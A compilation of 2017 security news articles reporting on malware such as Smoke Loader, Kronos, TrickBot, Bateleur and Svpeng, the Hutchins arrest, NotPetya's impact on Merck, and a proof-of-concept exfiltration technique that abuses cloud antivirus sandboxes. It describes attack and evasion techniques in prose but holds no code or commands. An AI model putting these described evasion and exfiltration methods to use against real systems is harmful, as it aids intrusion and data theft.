"Our exploit did not target a program used by biologists in the field; rather it targeted one that we modified to contain a known vulnerability," the researchers said.
Although this kind of hack probably doesn't pose any threat anytime soon, the team warned that hackers could in future use fake blood or spit samples to gain access to computers, steal information, or hack medical equipments installed at forensic labs, hospitals and the DNA-based data storage centers.
The researchers will be presenting this first "DNA-based exploit of a computer system" at the next week's Usenix Security Symposium in Vancouver. For the more in-depth explanation on the DNA-based hack, you can head on to the research paper.

Smoke Loader Backdoor Gets Anti-Analysis Improvements

8.8.2017 securityweek  Virus
The infamous Smoke Loader backdoor now has more complex anti-analysis techniques that allow it to remain a potent malware delivery mechanism, PhishLabs security researchers warn.

Also known as Dofoil, Smoke Loader has been advertised on dark web forums since at least mid-2011. Packing a modular design, the malware can receive secondary execution instructions and/or download additional functional modules. Lately, the loader has been used in the distribution of malware such as the TrickBot banking Trojan and GlobeImposter ransomware.

The Smoke Loader installer, the security researchers explain, spawns an EnumTools thread to detect and evade analysis tools, and uses an API to enumerate running analysis utilities. The malware checks for twelve analysis processes via a hash-based method, and terminates itself if one is found running. As part of an anti-VM check, it also queries the name and the volume information of the infected machine, along with a registry key.

“There are two main paths of execution in Smoke Loader, the installer and the loader. The installer path runs prior to spawning and injects into a new instance of a Windows Explorer process. Post injection, the loader runs and executes the core functionality of the module. Before injection occurs, Smoke Loader performs several checks to determine information about the system on which it is running,” PhishLabs says.

Smoke Loader was observed leveraging the VirtualProtect API call to change the protection of the allocated memory region, the security researchers reveal. Toward the end of the loader execution path, the malware also checks whether injection should occur, and execution continues if injection has not yet been performed.

The malware was observed performing networking checks to ensure the loader has Internet access (it can generate fake traffic for that). The security researchers also noticed that, unlike previous versions, the latest Smoke Loader variant uses a custom XOR-based algorithm to decode strings within the sample. Previously, the strings weren’t encoded.

“While Smoke Loader’s distribution is not as wide spread as other malware families, it is under continued development and very effective at what it does. The loader’s longevity indicates that the developers are committed to persistence and protection of their loader from the latest analysis techniques. Even though it dates back to 2011, the loader has undergone several transformations that allow it to continue to be a potent malware delivery mechanism in 2017,” PhishLabs concludes.

Hacker Sentenced to 46 Months in Prison for Spreading Linux Malware
4.8.2017 thehackernews

A Russian man accused of infecting tens of thousands of computer servers worldwide to generate millions in fraudulent payments has been imprisoned for 46 months (nearly four years) in a United States' federal prison.
41-year-old Maxim Senakh, of Velikii Novgorod, was arrested by Finnish police in August 2015 for his role in the development and maintenance of the infamous Linux botnet called Ebury that siphoned millions of dollars from victims worldwide.
Senakh was extradited to the United States in February 2016 to face charges and pleaded guilty in late March this year after admitting of creating a massive Ebury botnet and personally being profited from the scheme.
First spotted in 2011, Ebury is an SSH backdoor Trojan for Linux and Unix-style operating systems, such as FreeBSD or Solaris, which gives attackers full shell control of an infected machine remotely even if the password for affected user account is changed regularly.
Senakh and his associates used the malware to build an Ebury botnet network of thousands of compromised Linux systems, which had the capacity of sending over 35 million spam messages and redirecting more than 500,000 online visitors to exploit kits every day.

Senakh fraudulently generated millions of dollars in revenue running spam campaigns and committing advertising click frauds.
"Working within a massive criminal enterprise, Maxim Senakh helped create a sophisticated infrastructure that victimized thousands of Internet users across the world," said Acting U.S. Attorney Brooker.
"As society becomes more reliant on computers, cyber criminals like Senakh pose a serious threat. This Office, along with our law enforcement partners, is committed to detecting and prosecuting cyber criminals no matter where they reside."
Ebury first came into headlines in 2011 after Donald Ryan Austin, 27, of El Portal, Florida, installed the Trojan on multiple servers owned by kernel.org and the Linux Foundation, which maintain and distribute the Linux operating system kernel.
Austin, with no connection to the Ebury criminal gang, was arrested in September last year and was charged with 4 counts of intentional transmission causing damage to a protected computer.
Senakh was facing up to a combined 30 years in prison, after pleading guilty to conspiracy to commit wire fraud as well as violate the Computer Fraud and Abuse Act.
However, a US judge on Thursday sentenced Senakh to 46 months in prison, the Department of Justice announced on Thursday. The case was investigated by the Federal Bureau of Investigation's field office in Minneapolis.
Senakh will be deported back to Russia following his release from the U.S. prison.

UK Security Researcher 'Hero' Accused of Creating Bank Malware

4.8.2017 securityweek  Virus
A British computer security researcher hailed as a hero for thwarting the "WannaCry" ransomware onslaught was in US custody on Thursday after being indicted on charges of creating malware to attack banks.

Marcus Hutchins, known by the alias "Malwaretech," was charged in an indictment dated July 12 and unsealed by federal authorities in Wisconsin.

The US Justice Department said in a statement Hutchins was arrested Wednesday in Las Vegas, where a major Def Con hacker security conference took place over the weekend.

Twitter postings from other security researchers said he was detained as he prepared to fly back to Britain.

Hutchins faces criminal charges including conspiracy to commit computer fraud, according to the US Department of Justice.

The indictment accuses Hutchins and another individual of making and distributing Kronos "banking Trojan," a reference to malicious software designed to steal user names and passwords used at online banking sites.

Since it was created, Kronos has been configured to work on banking systems in Britain, Canada, Germany, Poland, France, and other countries, according to the DOJ.

The indictment set the time of the activity by Hutchins as being from July 2014 to July of the following year.

- 'Dark markets' -

Hutchins was part of a conspiracy to distribute the hacking tool on so-called dark markets, according to the indictment signed last month by US Attorney Gregory Haanstad.

Kronos was evidently first made available through certain internet forums in early 2014, and was marketed and distributed through a hidden online AlphaBay marketplace, according to US prosecutors.

AlphaBay was shut down by US and European police in a crackdown on two huge "dark web" marketplaces that allowed the anonymous online trade of drugs, hacking software and guns.

The timing of the indictment of Hutchins raises questions as to whether insights mined from the AlphaBay probe lead to his arrest.

Underground websites AlphaBay and Hansa Market had tens of thousands of sellers of deadly drugs like fentanyl and other illicit goods serving more than 200,000 customers worldwide.

AlphaBay, the largest dark web market, had been run out of Thailand, and filled a gap left behind by the notorious Silk Road online market, shut down by authorities in 2013.

Officials at the time said shutting down the two markets and the arrests of administrators enabled them to collect extensive intelligence on buyers and sellers, including criminal gangs. Their names were being distributed to law enforcement in 37 countries.

- From hero to accused -

Lawyers at the San Francisco-based online rights group Electronic Frontier Foundation said they were looking to contact Hutchins.

"The EFF is deeply concerned about the arrest of Marcus Hutchins, a security researcher known for shutting down the WannaCry ransomware. We are looking into the matter, and are reaching out to Hutchins," a statement from the group said.

A spokesperson for the British Embassy in Washington said only that they "are in touch with local authorities in Las Vegas following reports of a British man being arrested."

Hutchins was hailed as a hero in May for finding and triggering a "kill switch" for a WannaCry ransomware attack that was spreading wildly around the world, locking away data on computers and demanding money for its release.

Andrew Mabbitt, another security researcher who was with Hutchins in Las Vegas, said he did not believe the allegations. "He spent his career stopping malware, not writing it," Mabbitt said on Twitter.

WannaCry Hero Marcus Hutchins was detained in Las Vegas after Def Con conference
4.8.2017 securityaffairs

Marcus Hutchins, the expert who discovered the “kill switch” that halted the outbreak of the WannaCry ransomware was detained in Las Vegas after Def Con.
Marcus Hutchins, also known as MalwareTech, is the 22-year-old security expert who made the headlines after discovering the “kill switch” that halted the outbreak of the WannaCry ransomware. Marcus Hutchins has been arrested in in Las Vegas after attending the Def Con hacking conference and was detained by the FBI in the state of Nevada.

Marcus Hutchins

In the last 24 hours, there were no tweets from the account of the expert, and the news of the arrest was confirmed by a friend of the experts to Motherboard.

“Motherboard verified that a detainee called Marcus Hutchins, 23, was being held at the Henderson Detention Center in Nevada early on Thursday. A few hours after, Hutchins was moved to another facility, according to a close personal friend.” reported Motherboard.“The friend told Motherboard they “tried to visit him as soon as the detention centre opened but he had already been transferred out.” Motherboard granted the source anonymity due to privacy concerns.”
“I’ve spoken to the US Marshals again and they say they have no record of Marcus being in the system. At this point we’ve been trying to get in contact with Marcus for 18 hours and nobody knows where he’s been taken,” the person added. “We still don’t know why Marcus has been arrested and now we have no idea where in the US he’s been taken to and we’re extremely concerned for his welfare.”

At the time I was writing there are no precise information about the arrest and its motivation.

Hutchins discovered that registering the domain

it was possible to stop the propagation of the malware.

The Hutchins’s friend Andrew Mabbitt confirmed via Twitter that the expert is detained at FBI’s field office in Las Vegas.

Andrew Mabbitt @MabbsSec
Finally located @MalwareTechBlog, he's in the Las Vegas FBI field office. Can anyone provide legal representation?
7:48 PM - Aug 3, 2017
75 75 Replies 844 844 Retweets 856 856 likes
Twitter Ads info and privacy
The UK’s National Crime Agency confirmed to The Register that a UK national was arrested in Nevada, but doesn’t provide further information about the charges.

Today another event made the headlines, hackers behind WannaCry cashed out over $140,000 from the Bitcoins wallets used for the payments.

It’s is normal that many experts speculate the two events are correlated.

Stay Tuned!

Updated on August 3rd, 2017
“On Wednesday, 22-year-old Marcus Hutchins — who runs a security blog called MalwareTech — was arrested in Las Vegas for “his role in creating and distributing the Kronos banking Trojan,” according to a spokesperson from the U.S. Department of Justice.” states the CNN.

“The charges relate to alleged conduct occurring between July 2014 and July 2015.

According to an indictment provided to CNN Tech, Hutchins created the malware and shared it online. The Eastern District of Wisconsin returned a six-count indictment against Hutchins on July 12, 2017. It was unsealed at the time of his arrest.”

 Marcus Hutchins indictment

UK malware researcher Marcus Hutchins accused of creating Kronos Trojan
4.8.2017 securityaffairs

The British security researcher Marcus Hutchins was arrested by the FBI on Thursday after being indicted on charges of creating the Kronos banking malware.
The news of the Marcus Hutchins‘s arrest made the headlines, the motivation has shocked the IT sector; the British malware experts who stopped the WannaCry ransomware outbreak was arrested in Las Vegas on Wednesday on suspicion of being a malware author.

The 22-year-old security expert, also known as MalwareTech, has been arrested in in Las Vegas after attending the Def Con hacking conference and was detained by the FBI in the state of Nevada.

FBI agents nabbed the man at the airport while he was preparing to fly back to the UK, he was arrested for “his role in creating and distributing the Kronos banking Trojan,” according to a spokesperson from the U.S. Department of Justice.

According to the investigators, Marcus Hutchins created the malware and shared it online, below the indictment issued by Eastern District of Wisconsin.

The prosecutors believe Hutchins created, shared, and masterminded the Kronos banking Trojan between July 2014 and July 2015.

Marcus Hutchins indictment

Marcus Hutchins has developed the malicious code and he updated the code in February 2015 with a co-conspirator who is accused of advertising the Kronos banking Trojan on hacker forums.
The accomplice has sold at least one copy of the malware for $2,000, the US government also claims that on June 11, 2015, Hutchins sold attack code in America.

Kronos was developed starting from the Zeus Trojan, it took its name after the father of Zeus in Greek mythology, with the intent to steal money from victim’s bank accounts.

Principal featured advertised were:

Common credential-stealing techniques such as form grabbing and HTML injection compatible with the major browsers (Internet Explorer, Firefox and Chrome);+
32- and 64-bit ring3 (user-mode) rootkit capable of also “defending from other Trojans”;+
Antivirus bypassing;+
Malware-to-C&C communication encryption;+
Sandbox bypassing.+
Kronos malware was offered for $7,000 and it includes numerous modules for evading detection and analysis, the seller also offered a “try and buy” server for $1,000, giving the possibility to test the malware for a week prior to buying it.

Going back in the time, experts noticed that Marcus Hutchins tweeted the following message on July 13, 2014.

MalwareTech ✔@MalwareTechBlog
Anyone got a kronos sample?
7:26 PM - Jul 13, 2014
33 33 Replies 430 430 Retweets 330 330 likes
Twitter Ads info and privacy
The experts also speculate Hutchins was identified after the Feds shut down the darkweb marketplace Alphabay, where Kronos was available for sale. It is likely that Feds identified it during the investigation on the marketplace.

New TrickBot banking Trojan variant borrows spreading capabilities from Wannacry
3.8.2017 securityaffairs

A cyber gang is improving its version of the TrickBot banking Trojan by implementing the self-spreading worm-like capabilities used by WannaCry and NotPetya
Cybercriminals most of all are capitalizing the lesson from the recent WannaCry and NotPetya ransomware massive attacks.

At least one cyber gang is improving its version of the TrickBot banking Trojan by implementing the self-spreading worm-like capabilities that allowed both ransomware to rapidly spread worldwide.

The new version of the TrickBot banking Trojan, dubbed “1000029” (v24), includes the code for the exploitation of the Windows Server Message Block (SMB) vulnerability.

TrickBot banking Trojan.jpg

Recently malware experts at Flashpoint have discovered that the TrickBot Banking Trojan has been improved to spread locally across networks by exploiting the Server Message Block (SMB) flaw.

“On July 27, 2017, in coordination with Luciano Martins, Director of Cyber Risk Services at Deloitte, Flashpoint observed a new version – “1000029” – of the formidable “Trickbot” banking Trojan with a new “worm64Dll” module, spread via the email spam vector, impersonating invoices from a large international financial institution.” states the analysis shared by Flashpoint.

The experts noticed that n of TrickBot ‘1000029’ is still a developing phase, for example, the crooks haven’t yet implemented the feature to mass scan on the Internet for vulnerable systems.

The Trojan actually scans domains for lists of vulnerable servers via the NetServerEnum Windows API and enumerate other computers on the network via Lightweight Directory Access Protocol (LDAP).

“The Trickbot gang appears to be testing a worm-like malware propagation module, which appears to spread locally via Server Message Block (SMB), scan domains for lists of servers via NetServerEnum Windows API, and enumerate other computers via Lightweight Directory Access Protocol (LDAP) enumeration. As of this writing, this malware feature does not appear to be fully implemented by the criminal gang as the initial purported SMB exploit has not yet been observed.” continues the analysis.

The researchers also discovered that the new TrickBot variant can also be disguised as ‘setup.exe’ that is delivered through a PowerShell script to spread through interprocess communication and download additional version of TrickBot onto shared drives.

Experts have no doubt, the Trickbot crew will continue in improving the threat.

“Flashpoint assesses with moderate confidence that the Trickbot gang will likely continue to be a formidable force in the near term,” concludes Flashpoint.
“Even though the worm module appears to be rather crude in its present state, it’s evident that the Trickbot gang learned from the global ransomware worm-like outbreaks of WannaCry and ‘NotPetya’ and is attempting to replicate their methodology.”

The bateleur backdoor is the new weapon in the Carbank gang’s arsenal
3.8.2017 securityaffairs

Experts at Proofpoint noticed the infamous cyber crime gang Carbanak has added a new JScript backdoor dubbed Bateleur Backdoor to its arsenal.
According to researchers at security firm Proofpoint, the infamous cyber crime gang Carbanak has added a new JScript backdoor dubbed Bateleur Backdoor to its arsenal. Carbanak, aka FIN7, has also used updated macros.

The Carbanak gang was first discovered by Kaspersky Lab in 2015. the group has stolen at least $300 million from 100 financial institutions.

In early 2016, the Carbanak gang target banks and financial institutions, mainly in the US and the Middle East.

In November last year, experts at Trustwave uncovered a new campaign launched by the group targeting organizations in the hospitality sector.

In January, the Carbanak gang started using Google services for command and control (C&C) communication.

The crooks used the “ggldr” script to send and receive commands to and from Google Apps Script, Google Sheets, and Google Forms services.

Hackers used to create a unique Google Sheets spreadsheet for each infected user, in this way they attempted to avoid detection.

In May, researchers at Trustwave observed the group using new social engineering techniques and phishing techniques, including the use of hidden shortcut files (LNK files) for target compromise.

Back to the present, the group started using new macros and the Bateleur backdoor in attacks against United States-based chain restaurants.

“Proofpoint researchers have uncovered that the threat actor commonly referred to as FIN7 has added a new JScript backdoor called Bateleur and updated macros to its toolkit. We have observed these new tools being used to target U.S.-based chain restaurants, although FIN7 has previously targeted hospitality organizations, retailers, merchant services, suppliers and others.” ” reads the analysis published by Proofpoint. The new macros and Bateleur backdoor use sophisticated anti-analysis and sandbox evasion techniques as they attempt to cloak their activities and expand their victim pool.”

The Carbanak gang started using macro documents to drop the new JScript backdoor instead GGLDR script that was used in past campaigns to send and receive commands to and from Google Apps Script, Google Sheets, and Google Forms services.

Experts noticed that the Carbanak gang has updated multiple times both the macro and the malware since June.

Attackers used simple and effective messages to target a restaurant chain, if email is sent from an Outlook.com account then the text claims “This document is encrypted by Outlook Protect Service,”if it is sent by a Gmail account, the lure document instead claims “This document is encrypted by Google Documents Protect Service.”

carbank gang bateleur backdoor

The documents embed macros that access the malicious payload via a caption, then they extracts the JScript from the caption and save the content to debug.txt in the current user’s temporary folder (%TMP%). Next, the macro creates a scheduled task to execute debug.txt as a JScript (the Bateleur backdoor), it sleeps for 10 seconds before deleting the scheduled task

The Bateleur backdoor appears very sophisticated, it implements anti-sandbox and anti-analysis (obfuscation) mechanisms.

“The malicious JScript has robust capabilities that include anti-sandbox functionality, anti-analysis (obfuscation), retrieval of infected system information, listing of running processes, execution of custom commands and PowerShell scripts, loading of EXEs and DLLs, taking screenshots, uninstalling and updating itself, and possibly the ability to exfiltrate passwords, although the latter requires an additional module from the command and control server (C&C).” continues the analysis.

“Although Bateleur has a much smaller footprint than GGLDR/HALFBAKED, lacks basic features such as encoding in the C&C protocol, and does not have backup C&C servers, we expect the Bateleur developer(s) may add those features in the near future,” the security researchers say.

Proofpoint speculates the Bateleur backdoor is being used by the FIN7/Carbanak group, the researchers observed a threat actor that was using this specific code along with GGLDR scripts that was used exclusively by the gang.

The phishing messages were “sharing very similar or identical attachment names, subject lines, and/or sender addresses.”

The Bateleur backdoor was also leveraging the Tinymet Meterpreter downloader, a tool employed by Carbanak hackers since 2016.

“A small Meterpreter downloader script, called Tinymet by the actor(s) (possibly inspired by [5]), has repeatedly been observed being utilized by this group at least as far back as 2016 [6] as a Stage 2 payload. In at least one instance, we observed Bateleur downloading the same Tinymet Meterpreter downloader ” states Proofpoint.

The Carbanak is still active and continuously improve its Tactics, Techniques, and Procedures.

“We continue to see regular changes to the tactics and tools used by FIN7 in their attempt to infect more targets and evade detection. The Bateleur JScript backdoor and new macro-laden documents appear to be the latest in the group’s expanding toolset, providing new means of infection, additional ways of hiding their activity, and growing capabilities for stealing information and executing commands directly on victim machines,” ProofPoint concludes.

Carbanak Hackers Using Bateleur Backdoor

2.8.2017 securityweek  Virus
The financially-motivated Carbanak hacker group has added a new JScript backdoor to its cyber-weapons arsenal, along with updated macros, Proofpoint security researchers warn.

Also referred to as FIN7, the multinational gang of cybercriminals has been active for at least two years and has been associated with a variety of incidents this year. In 2015, Kasperskly Lab first outed the group, saying that had hit more than 100 banks across 30 countries and made off with up to one billion dollars over a period of roughly two years.

In early May, the group was said to have started using shims for process injection and persistence, only one week after adopting new phishing techniques, including the use of hidden shortcut files (LNK files) for target compromise.

Recently, the group started using new macros and a commodity backdoor called Bateleur in attacks against United States-based chain restaurants, Proofpoint reveals. Previously, the group had been targeting hospitality organizations, retailers, merchant services, suppliers and others.

The security researchers also note that both the new macros and the backdoor use sophisticated anti-analysis and sandbox evasion techniques. The group started using macro documents to drop the previously undocumented JScript backdoor in June, marking a switch from their customary GGLDR payload. Both the macro and the malware have seen multiple updates since June.

Depending on the type of account the spam email is sent from (i.e. Outlook, Gmail), the attachment document packs a matching lure by claiming that the document as encrypted by the mail service’s Protect Service. The macro-enabled document grabs the malicious payload from a caption, saves the content to debug.txt, then creates a scheduled task to execute debug.txt as a JScript. The macro sleeps for 10 seconds, then deletes the scheduled task

The malicious JScript – which is the Bateleur backdoor – has anti-sandbox and anti-analysis (obfuscation) functionality.

The malware can also retrieve a PowerShell command containing a payload capable of retrieving user account credentials, meaning that it could also potentially target user’s passwords with the help of an additional module, Proofpoint says.

Proofpoint has observed the malware jump from version 1.0 to over the course of a single month and reveals that several commands were added with the update, including the ability to execute a fetched EXE or PowerShell commands via WMI.

“Although Bateleur has a much smaller footprint than GGLDR/HALFBAKED, lacks basic features such as encoding in the C&C protocol, and does not have backup C&C servers, we expect the Bateleur developer(s) may add those features in the near future,” the security researchers say.

Proofpoint claims it has determined with a high degree of certainty that Bateleur is being used by the FIN7/Carbanak group, and also provides some evidence to sustain the claim.

In June, similar messages separately dropped GGLDR and Bateleur to the same target, and the timing and similarity suggest the same actor was behind all of them, especially with some messages “sharing very similar or identical attachment names, subject lines, and/or sender addresses.”

Bateleur was also observed downloading the Tinymet Meterpreter downloader, a tool employed by Carbanak hackers since at least as far back as 2016. A new command tinymet recently added to the FIN7-linked GGLDR/HALFBAKED backdoor was also observed downloading a JScript version of the Tinymet Meterpreter downloader.

“We continue to see regular changes to the tactics and tools used by FIN7 in their attempt to infect more targets and evade detection. The Bateleur JScript backdoor and new macro-laden documents appear to be the latest in the group’s expanding toolset, providing new means of infection, additional ways of hiding their activity, and growing capabilities for stealing information and executing commands directly on victim machines,” the security researchers conclude.

Dangerous Mobile Banking Trojan Gets 'Keylogger' to Steal Everything
1.8.2017 thehackernews
Cyber criminals are becoming more adept, innovative, and stealthy with each passing day. They have now shifted from traditional to more clandestine techniques that come with limitless attack vectors and are harder to detect.
Security researchers have discovered that one of the most dangerous Android banking Trojan families has now been modified to add a keylogger to its recent strain, giving attackers yet another way to steal victims sensitive data.
Kaspersky Lab's Senior malware analyst Roman Unuchek spotted a new variant of the well-known Android banking Trojan, dubbed Svpeng, in the mid of last month with a new keylogger feature, which takes advantage of Android's Accessibility Services.
Trojan Exploits 'Accessibility Services' to Add Keylogger
Yes, the keylogger added in the new version of Svpeng takes advantage of Accessibility Services — an Android feature that provides users alternative ways to interact with their smartphone devices.
This change makes the Svpeng Trojan able not only to steal entered text from other apps installed on the device and log all keystrokes, but also to grant itself more permissions and rights to prevent victims from uninstalling the Trojan.
In November last year, the Svpeng banking trojan infected over 318,000 Android devices across the world over the span of only two months with the help of Google AdSense advertisements that was abused to spread the malicious banking Trojan.
Over a month ago, researchers also discovered another attack taking advantage of Android's Accessibility Services, called Cloak and Dagger attack, which allows hackers to silently take full control of the infected devices and steal private data.
If You Are Russian, You Are Safe!
Although the new variant of the Svpeng malware is not yet widely deployed, the malware has already hit users in 23 countries over the course of a week, which include Russia, Germany, Turkey, Poland, and France.
But what's worth noticing is that, even though most infected users are from Russia, the new variant of Svpeng Trojan doesn't perform malicious actions on those devices.
According to Unuchek, after infecting the device, the Trojan first checks the device's language. If the language is Russian, the malware prevents further malicious tasks—this suggests the criminal group behind this malware is Russian, who are avoiding to violate Russian laws by hacking locals.
How 'Svpeng' Trojan Steals Your Money
Unuchek says the latest version of Svpeng he spotted in July was being distributed through malicious websites that disguised as a fake Flash Player.
Once installed, as I have mentioned above, the malware first checks for the device language and, if the language is not Russian, asks the device to use Accessibility Services, which opens the infected device to a number of dangerous attacks.
With having access to Accessibility Services, the Trojan grants itself device administrator rights, displays an overlay on the top of legitimate apps, installs itself as a default SMS app, and grants itself some dynamic permissions, such as the ability to make calls, send and receive SMS, and read contacts.
Additionally, using its newly-gained administrative capabilities, the Trojan can block every attempt of victims to remove device administrator rights—thereby preventing the uninstallation of the malware.
Using accessibility services, Svpeng gains access to the inner working of other apps on the device, allowing the Trojan to steal text entered on other apps and take screenshots every time the victim presses a button on the keyboard, and other available data.
"Some apps, mainly banking ones, do not allow screenshots to be taken when they are on top. In such cases, the Trojan has another option to steal data – it draws its phishing window over the attacked app," Unuchek says.
"It is interesting that, in order to find out which app is on top, it uses accessibility services too."
All the stolen information is then uploaded to the attackers' command and control (C&C) server. As part of his research, Unuchek said he managed to intercept an encrypted configuration file from the malware's C&C server.
Decrypting the file helped him find out some of the websites and apps that Svpeng targets, as well as help him obtain a URL with phishing pages for both the PayPal and eBay mobile apps, along with links for banking apps from the United Kingdom, Germany, Turkey, Australia, France, Poland, and Singapore.
Besides URLs, the file also allows the malware to receive various commands from the C&C server, which includes sending SMS, collecting information such as contacts, installed apps and call logs, opening the malicious link, gathering all SMS from the device, and stealing incoming SMS.
The Evolution of 'Svpeng' Android Banking Malware
Researchers at Kaspersky Lab initially discovered the Svpeng Android banking malware trojan back in 2013, with primary capability—Phishing.
Back in 2014, the malware was then modified to add a ransomware component that locked victim's device (by FBI because they visited sites containing pornography) and demanded $500 from users.
The malware was among the first to begin attacking SMS banking, use phishing web pages to overlay other apps in an effort to steal banking credentials and to block devices and demand money.
In 2016, cyber criminals were actively distributing Svpeng via Google AdSense using a vulnerability in the Chrome web browser, and now abusing Accessibility Services, which possibly makes Svpeng the most dangerous mobile banking malware family to date that can steal almost anything—from your Facebook credentials to your credit cards and bank accounts.
How to Protect Your Smartphone From Hackers
With just Accessibility Services, this banking Trojan gains all necessary permissions and rights to steal lots of data from the infected devices.
The malicious techniques of the Svpeng malware even work on fully-updated Android devices with the latest Android version and all security updates installed, so it is little users can do in order to protect themselves.
There are standard protection measures you need to follow to remain unaffected:
Always stick to trusted sources, like Google Play Store and the Apple App Store, but only from trusted and verified developers.
Most importantly, verify app permissions before installing apps. If any app is asking more than what it is meant for, just do not install it.
Do not download apps from third party sources, as most often such malware spreads via untrusted third-parties.
Avoid unknown and unsecured Wi-Fi hotspots and Keep your Wi-Fi turned OFF when not in use.
Never click on links provided in an SMS, MMS or email. Even if the email looks legit, go directly to the website of origin and verify any possible updates.
Install a good antivirus app that can detect and block such malware before it can infect your device, and always keep the app up-to-date.

Malware Attack Disrupts Merck's Worldwide Operations

1.8.2017 securityweek  Virus
American pharmaceutical giant Merck revealed in its financial results announcement for the second quarter of 2017 that a recent cyberattack has disrupted its worldwide operations, including manufacturing, research and sales.

While Merck has not provided details about the incident in its financial report, the June 27 attack referenced by the company is most likely the NotPetya malware outbreak that affected tens of thousands of systems in more than 65 countries. Many of the victims were located in Ukraine, the home of a tax software firm whose product was used as the main attack vector.

Researchers initially believed NotPetya (aka PetrWrap, exPetr, GoldenEye and Diskcoder.C) was a piece of ransomware, similar to WannaCry. However, a closer analysis revealed that it was actually a wiper and it was unlikely that victims could recover their files, even if they paid the ransom.

Merck, which was named as one of the victims of the NotPetya attack shortly after the outbreak started, said on Friday that it had yet to fully assess the impact of the disruption. The company said it had still been working on restoring operations and minimizing the effects of the incident.

“The company is in the process of restoring its manufacturing operations. To date, Merck has largely restored its packaging operations and has partially restored its formulation operations,” Merck said. “The company is in the process of restoring its Active Pharmaceutical Ingredient operations but is not yet producing bulk product. The company’s external manufacturing was not impacted. Throughout this time, Merck has continued to fulfill orders and ship product.”

Merck is just one of several major companies affected by the NotPetya attack. The list also includes Ukraine's central bank, Russian oil giant Rosneft, UK-based advertising group WPP, Danish shipping giant A.P. Moller-Maersk, and FedEx-owned TNT Express.

FedEx reported last month that it had still been working on restoring systems hit by the destructive malware attack, and admitted that it may not be able to fully restore all affected systems and recover all the critical business data encrypted by NotPetya.

Reckitt Benckiser, the British consumer goods company that makes Nurofen, Dettol and Durex products, said the attack disrupted its ability to manufacture and distribute products. The firm estimated that the incident could have an impact of £100 million ($130 million) on its revenue.

Someone Hijacks A Popular Chrome Extension to Push Malware
31.7.2017 thehackernews

Phishers have recently hacked an extension for Google Chrome after compromising the Chrome Web Store account of German developer team a9t9 software and abused to distribute spam messages to unsuspecting users.
Dubbed Copyfish, the extension allows users to extract text from images, PDF documents and video, and has more than 37,500 users.
Unfortunately, the Chrome extension of Copyfish has been hijacked and compromised by some unknown attacker, who equipped the extension with advertisement injection capabilities. However, its Firefox counterpart was not affected by the attack.
The attackers even moved the extension to their developer account, preventing its developers from removing the infected extension from the store, even after being spotted that the extension has been compromised.
"So far, the update looks like standard adware hack, but, as we still have no control over Copyfish, the thieves might update the extension another time… until we get it back," the developers warned. "We can not even disable it—as it is no longer in our developer account."
Here's How the Hackers Hijacked the Extension:

Copyfish developers traced the hack back to a phishing attack that occurred on 28 July.
According to a9t9 software, one of its team members received a phishing email impersonating the Chrome Web Store team that said them to update their Copyfish Chrome extension; otherwise, Google would remove it from the web store.
The phishing email instructed the member to click on "Click here to read more details," which opened the "Google" password dialogue box.
The provided link was a bit.ly link, but since the team member was viewing the link in HTML form, he did not find it immediately suspicious and entered the password for their developer account.
The developers said the password screen looked almost exactly the one used by Google. Although the team did not have any screenshot of the fake password page as it appeared only once, it did take a screenshot of the initial phishing email and its reply.
"This looked legit to the team member, so we did not notice the [phishing] attack as such at this point. [Phishing] for Chrome extensions was simply not on our radar screen," the developers said.
Once the developer entered the credentials for a9t9 software’s developer account, the hackers behind the attack updated the Copyfish extension on 29 July to Version 2.8.5, which is pushing out spams and advertisements to its users.
The worst part comes in when the Copyfish makers noticed the issue very quickly, but they could not do anything because the hackers moved the extension to their developer account.
The software company contacted Google developer support, which is currently working to provide the company access to their software.
The a9t9 software is warning users that the Chrome extension for Copyfish is currently not under its control. So, users are advised not to install the malicious Chrome extension and remove, if they have already installed.

PoC Malware Exploits Cloud Anti-Virus for Data Exfiltration

31.7.2017 securityweek  Virus
Security researchers at SafeBreach have created proof-of-concept (PoC) malware that can exfiltrate data from endpoints that don’t have a direct Internet connection by exploiting cloud-enhanced anti-virus (AV) agents.

Although highly secure enterprises might employ strict egress filtering, meaning that endpoints either have no direct Internet connection or have a connection restricted to hosts required by their legitimately installed software, data can be exfiltrated if cloud AV products are in use, the security researchers argue.

Presented at BlackHat USA 2017 by Itzik Kotler and Amit Klein from SafeBreach Labs, the PoC tool relies on packing data inside an executable the main malware process creates on the compromised endpoint. Thus, if the AV product employs an Internet-connected sandbox as part of its cloud service, data is exfiltrated as soon as the AV agent uploads the newly created executable to the cloud for further inspection, although the file is executed in an Internet connected sandbox.

In a whitepaper (PDF), the researchers not only provide data and insights on AV in-the-cloud sandboxes, but their also cover the use of on-premise sandboxes, cloud-based/online scanning and malware categorization services, and sample sharing. Furthermore, they provide information on how the attack can be further enhanced and how cloud-based AV vendors can mitigate it.

Dubbed Spacebin, the proof-of-concept tool was made available on GitHub. The project includes directories with both server-side and client-side code. Instructions on how to use the tool are available on the project’s page.

What Kotler and Klein focused on was the analysis of two network architectures found in highly secure organizations: one where endpoints don’t have access to the Internet, but an AV management server does; and another where the machines have access to a closed set of hosts, meaning there’s very limited access to the Internet. In both scenarios, cloud-based AV agents are deployed across all endpoints.

“We are going to abuse the cloud AV sandboxing feature that many AV vendors use. The rationale for this feature is that it enables the AV vendor to offer lightweight agent software, and carry out the heavy-lifting security analysis work in the cloud. Specifically, in such an architecture, the AV agent needs to conduct only basic security checks against other processes and files, allowing for a grey area where a binary “malicious/non-malicious” decision cannot be determined locally. A process/file falling into this grey area is sent to the cloud for further analysis, and a security decision is obtained from the cloud (sometimes in near real time),” the researchers explain.

The sample is typically executed in an AV cloud sandbox and its behavior observed there, where a malicious program can run with no harm to real users or resources, the researchers note. They also argue that the AV cloud sandbox would normally be connected to the Internet, as this would provide better detection capabilities (for example, the malware might attempt to connect to a command and control server and the sandbox would detect that).

“The attacker process (called Rocket) contains a secondary executable (called Satellite) as part of its data. The Satellite can be encrypted/compressed to hide the fact that it is another executable, thus the Satellite can be no more than a piece of data in the Rocket memory space (and file) that does not jeopardize the Rocket. The Satellite contains a placeholder for arbitrary data (“payload”) to be exfiltrated. The location of the placeholder should be known to the Rocket,” the researchers explain.

As part of the attack, the Rocket collects the data (payload) it needs to exfiltrate, decrypts / decompresses the Satellite and embeds the payload in its image (can further compress or encrypt the payload), writes the Satellite image to disk as a file, and spawns the Satellite (from its file) as a child process.

